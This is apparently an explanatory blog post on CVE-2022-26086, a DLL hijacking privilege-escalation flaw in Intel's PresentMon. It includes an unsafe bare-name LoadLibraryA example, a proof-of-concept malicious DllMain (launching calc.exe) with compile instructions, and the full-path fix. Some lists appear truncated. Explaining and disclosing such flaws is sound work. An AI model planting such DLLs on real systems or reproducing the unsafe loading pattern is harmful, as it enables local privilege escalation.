CVE-2022-26086 exposes a privilege escalation vulnerability in Intel’s PresentMon tool (before version 1.7.1). This blog post breaks down what went wrong, how it could be exploited, and how the problem was fixed—with simple code examples and reference links.
What is PresentMon?
PresentMon is a command-line tool developed by Intel® for recording frame present data in Windows games and applications. It’s an open-source, performance-analysis nerd’s delight.
The Vulnerability: Uncontrolled Search Path Element
CVE-2022-26086 is all about the search (or loading) path for required DLLs. Intel described it here:
> "Uncontrolled search path element in the PresentMon software before version 1.7.1 may allow an authenticated user to potentially enable escalation of privilege via local access."
In plain English: PresentMon loads DLLs from places it shouldn’t, letting a local attacker trick it into running their code with higher privileges.
How Does This Work?
When Windows applications load DLLs (dynamic-link libraries), they look in a specific set of folders. If the application's code doesn’t “control” exactly where DLLs are loaded from, a local attacker could plant a malicious DLL in a spot that gets picked up. This is called DLL preloading or DLL hijacking.
Here’s a typical, unsafe scenario
// Bad way (example pseudo-code)
LoadLibraryA("MyHelper.dll"); // Windows checks untrusted folders!
If you just say LoadLibraryA("MyHelper.dll"), Windows looks for MyHelper.dll in several places, including:
Directories listed in the PATH environment variable
If an attacker drops a malicious MyHelper.dll in a folder Windows checks early, when PresentMon runs, it will unknowingly execute the attacker’s code.
Exploit Example (Proof of Concept)
Imagine you're a regular user, but PresentMon is running with higher privileges (like Administrator). If you can write to the folder where PresentMon starts (maybe C:\Program Files\PresentMon\ or a temp folder), you could save your own DLL there.
Here’s a Python example of creating a malicious DLL (“just” launches Calculator on DLL load)
# generate evil_dll.cpp
cpp_code = """
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("calc.exe");
}
return TRUE;
}
"""
# Save as evil_dll.cpp and compile with Visual Studio
# cl /LD evil_dll.cpp /Fe:MyHelper.dll
Once the rogue DLL is in place, when PresentMon loads, it would execute your code (calc.exe in this example).
Impact
- Who is at risk? Only users with local access, since the exploit needs to drop DLLs on the filesystem.
- What could they do? Escalate their privileges if PresentMon is running as a higher-privileged user (like an admin or SYSTEM).
- How serious? It’s a classic escalation-of-privilege flaw, useful in chaining together privilege attacks.
The Fix
Intel fixed this in PresentMon v1.7.1:
They ensured PresentMon doesn’t load DLLs from untrusted directories.
Never load DLLs by simple names. Always use full, trusted paths, and call SetDllDirectory(NULL) to limit DLL search paths.
// Safer way
SetDllDirectory(NULL); // Remove current folder from search
LoadLibraryA("C:\\Program Files\\PresentMon\\MyHelper.dll"); // Full path
Official References
- Intel Security Advisory: Intel-SA-00702
- CVE Details: CVE-2022-26086
- PresentMon Official Releases
Make sure users cannot write to the directory where PresentMon is installed.
3. Apply the principle of least privilege—don’t run tools like this with more privilege than needed!
Conclusion
CVE-2022-26086 is a classic, yet dangerous vulnerability that can be avoided by securing the way applications load external libraries. Keeping software up-to-date and restricting write permissions are your best defenses!
Have questions or want to learn more about Windows DLL exploits? Share your thoughts below!
Timeline
Published on: 11/11/2022 16:15:00 UTC
Last modified on: 11/17/2022 22:24:00 UTC